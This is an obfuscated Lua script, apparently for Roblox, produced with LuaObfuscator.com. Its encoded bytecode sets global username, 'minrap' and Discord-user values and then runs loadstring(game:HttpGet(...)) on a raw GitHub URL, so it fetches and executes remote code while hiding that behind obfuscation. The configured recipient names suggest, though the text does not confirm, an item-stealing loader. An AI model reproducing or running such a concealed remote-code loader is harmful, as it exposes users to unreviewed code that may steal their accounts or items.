--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v92=0;local v93;while true do if (v92==0) then v93=v2(v0(v30,16));if v19 then local v121=v5(v93,v19);v19=nil;return v121;else return v93;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v94=0 -0 ;local v95;while true do if (v94==0) then v95=(v31/((5 -3)^(v32-(1 -0))))%((4 -2)^(((v33-1) -(v32-1)) + (620 -(555 + 64)))) ;return v95-(v95%((838 + 94) -(857 + 74))) ;end end else local v96=568 -(367 + 201) ;local v97;while true do if (v96==((1321 -394) -(214 + (1778 -(68 + 997))))) then v97=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v97 + v97))>=v97) and (878 -(282 + 595))) or (1637 -(1523 + 114)) ;end end end end local function v21() local v34=1270 -(226 + (2001 -(892 + 65))) ;local v35;while true do if (v34==(4 -3)) then return v35;end if (v34==((278 -161) -(32 + 85))) then v35=v1(v16,v18,v18);v18=v18 + 1 + (0 -0) ;v34=1 + 0 ;end end end local function v22() local v36=0 -0 ;local v37;local v38;while true do if (v36==0) then v37,v38=v1(v16,v18,v18 + (352 -(87 + 263)) );v18=v18 + 2 ;v36=181 -(67 + 113) ;end if (v36==(1 + 0)) then return (v38 * ((462 + 166) -(1478 -1106))) + v37 ;end end end local function v23() local v39=952 -(802 + 150) ;local v40;local v41;local v42;local v43;while true do if (v39==(2 -1)) then return (v43 * (30433252 -13656036)) + (v42 * (47703 + (23452 -5619))) + (v41 * (1253 -(915 + 82))) + v40 ;end if (v39==(0 -0)) then v40,v41,v42,v43=v1(v16,v18,v18 + 2 + 1 );v18=v18 + 4 ;v39=1;end end end local function v24() local v44=0;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v44==(1190 -(1069 + (418 -300)))) then if (v49==(0 -0)) then if (v48==(0 -0)) then return v50 * 0 ;else v49=1;v47=(859 -(814 + 45)) + 0 ;end elseif (v49==(3636 -1589)) then return ((v48==(0 + 0)) and (v50 * ((792 -(368 + 423))/(0 -0)))) or (v50 * NaN) ;end return v8(v50,v49-(1041 -(10 + (19 -11))) ) * (v47 + (v48/((7 -5)^((27 + 467) -(416 + 26))))) ;end if (v44==((3 + 3) -4)) then v49=v20(v46,10 + 11 ,54 -23 );v50=((v20(v46,470 -(145 + 293) )==(431 -(44 + 386))) and  -(1487 -(998 + 488))) or (1 + 0) ;v44=3;end if (v44==1) then v47=1;v48=(v20(v46,1 + 0 ,792 -(201 + 571) ) * (2^(1170 -(116 + 1022)))) + v45 ;v44=8 -(891 -(261 + 624)) ;end if (v44==(0 + (0 -0))) then v45=v23();v46=v23();v44=3 -2 ;end end end local function v25(v51) local v52;if  not v51 then v51=v23();if (v51==(1080 -(1020 + 60))) then return "";end end v52=v3(v16,v18,(v18 + v51) -(1424 -(630 + 793)) );v18=v18 + v51 ;local v53={};for v69=3 -2 , #v52 do v53[v69]=v2(v1(v3(v52,v69,v69)));end return v6(v53);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return function(v98,v99,v100,v101,v102,v103,v104,v105,v106) local v107=(function() return 0;end)();local v98=(function() return;end)();local v99=(function() return;end)();while true do local v116=(function() return 0;end)();while true do if (v116==0) then if (v107==(1 + 0)) then local v125=(function() return 0;end)();while true do if (v125==0) then while true do if (v98==0) then v99=(function() return v100();end)();if (v101(v99, #"}", #"}")==0) then local v176=(function() return 0 -0 ;end)();local v177=(function() return;end)();local v178=(function() return;end)();local v179=(function() return;end)();while true do if (v176~=1) then else local v180=(function() return 0 -0 ;end)();while true do if (v180==(0 -0)) then local v186=(function() return 285 -(134 + 151) ;end)();while true do if (v186~=(1666 -(970 + 695))) then else v180=(function() return 1;end)();break;end if (v186==(0 -0)) then v179=(function() return {v102(),v102(),nil,nil};end)();if (v177==(0 -0)) then local v187=(function() return 0;end)();local v188=(function() return;end)();while true do if (v187~=0) then else v188=(function() return 0;end)();while true do if (v188==(0 -0)) then v179[ #"19("]=(function() return v102();end)();v179[ #"?id="]=(function() return v102();end)();break;end end break;end end elseif (v177== #">") then v179[ #"nil"]=(function() return v103();end)();elseif (v177==(7 -5)) then v179[ #"19("]=(function() return v103() -(2^(1840 -(1195 + 629))) ;end)();elseif (v177~= #"xxx") then else local v193=(function() return 0;end)();local v194=(function() return;end)();while true do if ((0 -0)==v193) then v194=(function() return 241 -(187 + 54) ;end)();while true do if (v194==(780 -(162 + 618))) then v179[ #"gha"]=(function() return v103() -(2^(12 + 4)) ;end)();v179[ #"0313"]=(function() return v102();end)();break;end end break;end end end v186=(function() return 1 + 0 ;end)();end end end if ((1 -0)==v180) then v176=(function() return 2;end)();break;end end end if (0==v176) then local v181=(function() return 0 -0 ;end)();while true do if (v181==1) then v176=(function() return 1;end)();break;end if (v181~=0) then else v177=(function() return v101(v99,2, #"19(");end)();v178=(function() return v101(v99, #"0313",1 + 5 );end)();v181=(function() return 1637 -(1373 + 263) ;end)();end end end if (v176~=(1003 -(451 + 549))) then else if (v101(v178, #"-19", #"91(")== #"<") then v179[ #"?id="]=(function() return v104[v179[ #"asd1"]];end)();end v105[v106]=(function() return v179;end)();break;end if (v176==2) then if (v101(v178, #"|", #":")== #" ") then v179[1 + 1 ]=(function() return v104[v179[2 -0 ]];end)();end if (v101(v178,2,2)== #"|") then v179[ #"xxx"]=(function() return v104[v179[ #"91("]];end)();end v176=(function() return 3;end)();end end end break;end end return v98,v99,v100,v101,v102,v103,v104,v105,v106;end end end if (v107~=0) then else local v126=(function() return 0 -0 ;end)();local v127=(function() return;end)();while true do if ((1384 -(746 + 638))~=v126) then else v127=(function() return 0 + 0 ;end)();while true do if (v127==0) then v98=(function() return 0;end)();v99=(function() return nil;end)();v127=(function() return 1 -0 ;end)();end if ((342 -(218 + 123))==v127) then v107=(function() return 1582 -(1535 + 46) ;end)();break;end end break;end end end break;end end end end;end)();local v55=(function() return function(v108,v109,v110) local v111=(function() return 0;end)();local v112=(function() return;end)();while true do if ((0 + 0)==v111) then v112=(function() return 0;end)();while true do if (v112~=(0 + 0)) then else local v128=(function() return 0;end)();local v129=(function() return;end)();while true do if (v128~=0) then else v129=(function() return 0;end)();while true do if (0==v129) then v108[v109-#"}" ]=(function() return v110();end)();return v108,v109,v110;end end break;end end end end break;end end end;end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {};end)();local v59=(function() return {v56,v57,nil,v58};end)();local v60=(function() return v23();end)();local v61=(function() return {};end)();for v71= #"|",v60 do local v72=(function() return 0;end)();local v73=(function() return;end)();local v74=(function() return;end)();local v75=(function() return;end)();while true do if (v72==(560 -(306 + 254))) then v73=(function() return 0 + 0 ;end)();v74=(function() return nil;end)();v72=(function() return 1;end)();end if (v72==(1 -0)) then v75=(function() return nil;end)();while true do if ((1467 -(899 + 568))~=v73) then else local v122=(function() return 0;end)();local v123=(function() return;end)();while true do if (v122~=0) then else v123=(function() return 0 + 0 ;end)();while true do if (v123==(2 -1)) then v73=(function() return 604 -(268 + 335) ;end)();break;end if (v123==(290 -(60 + 230))) then local v172=(function() return 572 -(426 + 146) ;end)();while true do if (v172~=1) then else v123=(function() return 1 + 0 ;end)();break;end if (v172==(1456 -(282 + 1174))) then v74=(function() return v21();end)();v75=(function() return nil;end)();v172=(function() return 1;end)();end end end end break;end end end if (v73==(812 -(569 + 242))) then if (v74== #" ") then v75=(function() return v21()~=(0 -0) ;end)();elseif (v74==2) then v75=(function() return v24();end)();elseif (v74== #"gha") then v75=(function() return v25();end)();end v61[v71]=(function() return v75;end)();break;end end break;end end end v59[ #"nil"]=(function() return v21();end)();for v76= #"<",v23() do FlatIdent_380E8,Descriptor,v21,v20,v22,v23,v61,v56,v76=(function() return v54(FlatIdent_380E8,Descriptor,v21,v20,v22,v23,v61,v56,v76);end)();end for v77= #":",v23() do v57,v77,v28=(function() return v55(v57,v77,v28);end)();end return v59;end local function v29(v63,v64,v65) local v66=v63[3 -2 ];local v67=v63[2 + 0 ];local v68=v63[1 + 2 ];return function(...) local v78=v66;local v79=v67;local v80=v68;local v81=v27;local v82=851 -(20 + 609 + 221) ;local v83= -(1025 -(528 + 178 + 318));local v84={};local v85={...};local v86=v12("#",...) -(1252 -(721 + 530)) ;local v87={};local v88={};for v113=0 + (1975 -(1913 + 62)) ,v86 do if (v113>=v80) then v84[v113-v80 ]=v85[v113 + (1272 -(945 + 326)) ];else v88[v113]=v85[v113 + (2 -1) ];end end local v89=(v86-v80) + 1 + 0 ;local v90;local v91;while true do v90=v78[v82];v91=v90[701 -(271 + 429) ];if (v91<=(2 + 0 + 2)) then if ((v91<=(1 + (0 -0))) or (516>3434)) then if (v91==(1500 -(1408 + 92))) then v88[v90[1 + 1 ]][v90[1089 -(461 + (2558 -(565 + 1368))) ]]=v90[1292 -(993 + 295) ];elseif ((4046>=3033) and (v88[v90[1 + 1 ]]==v90[9 -5 ])) then v82=v82 + (1172 -(418 + (2831 -2078))) ;else v82=v90[2 + (1662 -(1477 + 184)) ];end elseif (v91<=(1 + 1)) then do return;end elseif ((v91>(1 + 2)) or (2719<=1447)) then v88[v90[1 + 1 ]]=v65[v90[(724 -192) -(406 + 123) ]];else local v143=v90[1771 -(1749 + 20) ];v88[v143]=v88[v143](v13(v88,v143 + 1 + 0 ,v83));end elseif (v91<=(1329 -(1249 + 73))) then if ((v91<=(2 + 3 + 0)) or (4134<3926)) then v82=v90[1148 -((1322 -(564 + 292)) + (1170 -491)) ];elseif (v91==(14 -8)) then v88[v90[2 + 0 ]]();else local v145=v90[5 -3 ];local v146=v88[v90[1903 -(106 + 1794) ]];v88[v145 + 1 ]=v146;v88[v145]=v146[v90[2 + 2 ]];end elseif (v91<=(22 -14)) then local v133=v90[1 + 1 ];local v134,v135=v81(v88[v133](v13(v88,v133 + (2 -1) ,v90[8 -5 ])));v83=(v135 + v133) -(2 -(305 -(244 + 60))) ;local v136=753 -(239 + 514) ;for v137=v133,v83 do v136=v136 + ((89 + 26) -(4 + 110)) ;v88[v137]=v134[v136];end elseif (v91>((1069 -(41 + 435)) -(57 + 527))) then v88[v90[1429 -(41 + 1386) ]]=v90[106 -((1018 -(938 + 63)) + 86) ];else local v152;local v153,v154;local v155;local v156;v88[v90[2 + 0 ]]=v65[v90[3 + 0 ]];v82=v82 + (1 -0) ;v90=v78[v82];v156=v90[1204 -(373 + 829) ];v155=v88[v90[8 -5 ]];v88[v156 + (1131 -(369 + 761)) ]=v155;v88[v156]=v155[v90[3 + 1 ]];v82=v82 + ((129 + 38) -(122 + (1169 -(936 + 189)))) ;v90=v78[v82];v88[v90[2 -0 ]]=v90[9 -6 ];v82=v82 + 1 + 0 ;v90=v78[v82];v156=v90[1 + 1 ];v153,v154=v81(v88[v156](v13(v88,v156 + (1 -0) ,v90[68 -(30 + 35) ])));v83=(v154 + v156) -(1 + 0) ;v152=0;for v170=v156,v83 do local v171=1257 -(1043 + 214) ;while true do if (v171==(336 -(144 + 192))) then v152=v152 + (3 -2) ;v88[v170]=v153[v152];break;end end end v82=v82 + ((400 + 813) -(323 + (2502 -(1565 + 48)))) ;v90=v78[v82];v156=v90[5 -3 ];v88[v156]=v88[v156](v13(v88,v156 + (581 -(361 + 219)) ,v83));v82=v82 + (321 -(53 + 267)) ;v90=v78[v82];v88[v90[1 + 1 ]]();v82=v82 + (414 -(15 + 398)) ;v90=v78[v82];v82=v90[985 -(18 + 964) ];end v82=v82 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!103Q00028Q0003023Q005F4703083Q00557365726E616D65030B3Q00657363617061706461313403093Q00557365726E616D6532030F3Q00634841494E534E4154434845523235026Q00F03F03063Q006D696E726170025Q006AF84003083Q00646973637573657203123Q00393438333Q32332Q392Q34373430393334027Q0040030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403483Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F626F2Q7461682Q332F5468756E6465722D7A2F726566732F68656164732F6D61696E2F485542001B3Q00120A3Q00013Q0026013Q0008000100010004053Q00080001001204000100023Q00302Q000100030004001204000100023Q00302Q00010005000600120A3Q00073Q0026013Q000F000100070004053Q000F0001001204000100023Q00302Q000100080009001204000100023Q00302Q0001000A000B00120A3Q000C3Q0026013Q00010001000C0004053Q000100010012040001000D3Q0012090002000E3Q00202Q00020002000F00122Q000400106Q000200046Q00013Q00024Q00010001000100044Q001A00010004053Q000100012Q00023Q00017Q00",v9(),...);
